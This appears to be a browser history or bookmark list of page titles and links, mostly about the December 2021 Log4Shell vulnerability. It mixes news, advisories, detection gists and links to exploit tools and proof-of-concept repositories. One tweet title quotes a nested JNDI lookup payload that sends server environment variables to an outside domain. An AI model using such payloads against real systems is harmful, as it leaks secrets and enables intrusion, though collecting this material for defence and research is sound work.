Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package | LunaTrace
https://www.lunasec.io/docs/blog/log4j-zero-day/
GitHub - YfryTchsGD/Log4jAttackSurface
https://github.com/YfryTchsGD/Log4jAttackSurface
GreyNoise on Twitter: "GreyNoise is detecting a sharply increasing number of hosts opportunistically exploiting Apache Log4J CVE-2021-44228. Exploitation occurring from ~100 distinct hosts, almost all of which are Tor exit nodes. Tags available to all users and customers now. https://t.co/JF3tUkpIrq https://t.co/CTMi0IWQ5j" / Twitter
https://twitter.com/GreyNoiseIO/status/1469326260803416073
CVE-2021-44228 Apache Log4j RCE Attempts Dec 20th 9:27PM ET · GitHub
https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217
GitHub - tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce: Apache Log4j 远程代码执行
https://github.com/tangxiaofeng7/apache-log4j-poc
Log4j RCE CVE-2021-44228 Exploitation Detection · GitHub
https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
eXploit – CVE-2021-42287/CVE-2021-42278 Weaponisation
https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html
us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf
Exploiting JNDI Injections in Java | Veracode blog
https://www.veracode.com/blog/research/exploiting-jndi-injections-java
Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet | Ars Technica
https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/
Tweet / Twitter
https://twitter.com/GossiTheDog/status/1469121209111658498
Canarytokens
https://canarytokens.org
Query Results | GreyNoise Visualizer
https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22
Log4j zero-day gets security fix just as scans for vulnerable systems ramp up
https://therecord.media/log4j-zero-day-gets-security-fix-just-as-scans-for-vulnerable-systems-ramp-up/
The Cyber Startup Observatory - The Global Cyber Innovation Network
https://cyberstartupobservatory.com
GreyNoise on Twitter: "Count of hosts exploiting CVE-2021-44228 has increased from 100 to 150 in several hours. Please find gists w/ IPs exploiting this vulnerability at scale + C2 callback domains. C2/callback domains -https://t.co/6BJ4rb8QX3 IPs exploiting the vuln at scale -https://t.co/NxcIwzWs6J https://t.co/slhUu9VPDT" / Twitter
https://twitter.com/GreyNoiseIO/status/1469376214079053833
CIRCL - @[email protected] on Twitter: "TR-65 - Vulnerabilities and Exploitation of Log4j (Remote code injection in Log4j) https://t.co/YqFmTTFQFK We will update regularly the TR with additional information. CVE-2021-44228 https://t.co/4GNcI1CmdA" / Twitter
https://twitter.com/circl_lu/status/1469261434446036997
Canarytokens
https://canarytokens.org/generate#
active-scan-plus-plus/activeScan++.py at master · PortSwigger/active-scan-plus-plus · GitHub
https://github.com/PortSwigger/active-scan-plus-plus/blob/master/activeScan++.py
us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf
GitHub - veracode-research/rogue-jndi: A malicious LDAP server for JNDI injection attacks
https://github.com/veracode-research/rogue-jndi
Tanner Barnes on Twitter: "In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like ${jndi:ldap://${env:user}.xyz.collab.com/a} Will leak server side env vars!" / Twitter
https://twitter.com/_StaticFlow_/status/1469358229767475205
Restrict LDAP access via JNDI by rgoers · Pull Request #608 · apache/logging-log4j2 · GitHub
https://github.com/apache/logging-log4j2/pull/608
Log4j – Apache Log4j Security Vulnerabilities
https://logging.apache.org/log4j/2.x/security.html
GitHub - mubix/CVE-2021-44228-Log4Shell-Hashes: Hashes for vulnerable LOG4J versions
https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
Remote code injection in Log4j · CVE-2021-44228 · GitHub Advisory Database · GitHub
https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
PentesterLab: Learn Web App Pentesting!
https://pentesterlab.com/exercises/log4j_rce/course
1.6 Million WordPress Sites Under Cyberattack From Over 16,000 IP Addresses
https://thehackernews.com/2021/12/16-million-wordpress-sites-under.html
Andrew Morris on Twitter: "Fuck money. We're gonna start posting IOCs/raw data for hosts exploiting Apache Log4J CVE-2021-44228 as often as we can to get the info to as many people as possible. Gists/pastes to follow from the GN twitter account." / Twitter
https://twitter.com/Andrew___Morris/status/1469334257529204740
GitHub - wyunan/Log4j-rce: Log4j-rce
https://github.com/Al0sc/Log4j-rce
Space / Twitter
https://twitter.com/i/spaces/1MnGnkbOXYoJO
GitHub - welk1n/JNDI-Injection-Exploit: JNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)
https://github.com/welk1n/JNDI-Injection-Exploit
conti-cyber-attack-on-the-hse-full-report.pdf
https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf
Proofpoint Emerging Threats Rules
https://rules.emergingthreatspro.com/open/
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
Log4Shell: Nuevo 0-day Y Exploit RCE En Apache Log4j (CVE-2021-44228) | CronUp Ciberseguridad
https://www.cronup.com/log4shell-nuevo-0-day-y-exploit-rce-en-apache-log4j-cve-2021-44228/
BlackCat: A New Rust-based Ransomware Malware Spotted in the Wild
https://thehackernews.com/2021/12/blackcat-new-rust-based-ransomware.html
GitHub - nice0e3/log4j_POC
https://github.com/nice0e3/log4j_POC
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (https://www.lunasec.io/docs/blog/log4j-zero-day/) · GitHub
https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
Python setter for property sAMAccountName for CVE-2021-42287/CVE-2021-42278 · GitHub
https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383
Russia Blocks Tor Privacy Service in Latest Censorship Move
https://thehackernews.com/2021/12/russia-blocks-tor-privacy-service-in.html
Massive attack against 1.6 million WordPress sites underway
https://www.bleepingcomputer.com/news/security/massive-attack-against-16-million-wordpress-sites-underway/
Deutsche Telekom CERT on Twitter: "🚨⚠️New #0-day vulnerability tracked under "Log4Shell" and CVE-2021-44228 discovered in Apache Log4j 🌶️‼️ We are observing attacks in our honeypot infrastructure coming from the TOR network. Find Mitigation instructions here: https://t.co/tUKJSn8RPF https://t.co/WkAn911rZX" / Twitter
https://twitter.com/DTCERT/status/1469258597930614787?s=20
Enterprise Attack Initial Access w/ Steve Borosh - Antisyphon
https://www.antisyphontraining.com/enterprise-attack-initial-access-w-steve-borosh/#course-scheduleY
Tweet / Twitter
https://twitter.com/GossiTheDog/status/1469248250670727169
A Simple Exploit is Exposing the Biggest Apps on the Internet
https://www.vice.com/en/article/93bag7/a-simple-exploit-is-exposing-the-biggest-apps-on-the-internet
Tweet / Twitter
https://twitter.com/P0rZ9/status/1468949890571337731
Release log4j-2.15.0-rc1 · apache/logging-log4j2 · GitHub
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1
Technical Advisory – SonicWall SMA 100 Series – Heap-Based Buffer Overflow (CVE-2021-20043) | NCC Group Research Blog | Making the world safer and more secure
https://research.nccgroup.com/2021/12/09/technical-advisory-sonicwall-sma-100-series-heap-based-buffer-overflow-cve-2021-20043/
2021 Internet Hall of Fame Induction Ceremony on Livestream
https://livestream.com/internetsociety/ihof2021
sAMAccountName spoofing - The Hacker Recipes
https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
A Cognitive Skills Assessment of Digital Forensic Analysts – My Doctoral Dissertation | Chris Sanders
https://chrissanders.org/2021/12/dissertation/
abuse.ch on Twitter: "#TrickBot (rob142) and #Emotet (epoch5) using the same malware distribution server 🕵️👀 mshta -> html -> PowerShell -> DLL 🔥 👉 https://t.co/aNpv2i9oKP TrickBot XLSM (rob142): 📄 https://t.co/a3b0gcfjPc Emotet XLSM (epoch5): 📄 https://t.co/sFcjCdU3xi https://t.co/UG8fJHkazg" / Twitter
https://twitter.com/abuse_ch/status/1468985961669443584
Charlie Clark on Twitter: "So with some help from @_EthicalChaos_ I found a way to weaponise CVE-2021-42287/CVE-2021-42278 and more help from @4ndr3w6S we put some detections together: https://t.co/FwQuI2DiPQ" / Twitter
https://twitter.com/exploitph/status/1469157138928914432
SANS Holiday Hack Challenge & KringleCon 2022 | SANS Institute
http://sans.org/holidayhack
Cas van Cooten on Twitter: "A story in three parts 😶 #log4j https://t.co/XMl02BcaJY" / Twitter
https://twitter.com/chvancooten/status/1469340927923826691?s=20
SANS Holiday Hack Challenge & KringleCon 2022 | SANS Institute
https://sans.org/u/1jm7
Technical Advisory – SonicWall SMA 100 Series – Unauthenticated File Upload Path Traversal (CVE-2021-20040) | NCC Group Research Blog | Making the world safer and more secure
https://research.nccgroup.com/2021/12/09/technical-advisory-sonicwall-sma-100-series-unauthenticated-file-upload-path-traversal-cve-2021-20040/
Log4j RCE 0-day actively exploited | CERT NZ
https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/
Worst Apache Log4j RCE Zero day Dropped on Internet - Cyber Kendra
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html